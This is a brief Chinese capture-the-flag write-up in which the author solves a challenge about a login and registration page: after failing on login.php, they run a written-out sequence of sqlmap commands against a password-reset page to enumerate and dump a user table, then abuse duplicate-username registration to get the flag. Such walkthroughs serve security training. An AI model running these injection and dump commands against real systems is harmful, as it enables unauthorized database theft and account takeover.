一.进入实验
1.根据实验的提示,工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。
看到登录和注册就先试一试sql注入,手工试了半天没什么用,然后想用sqlmap看能不能注入:
python sqlmap.py -u "http://111.198.29.45:56964/login.php" --data "username=123&password=123" --dbs
这里没有注入点,也猜到了出题人不可能这么容易让我们拿到flag,,,
然后我发现这里有个忘记密码,那就点点看了:
这里貌似有SQL注入,那就再用sqlmap跑一下。
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" --dbs
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 --tables 得到user表
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user --columns
python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user -C "username,password" --dump
得到一个我没有注册过的账号,猜测这个应该和flag有关,这个password应该是md5加密过的,试了没能解密成功,但这里不要紧,利用这里的
同一个用户名可以重复注册的漏洞,去注册一个新的账号,然后登录获得flag。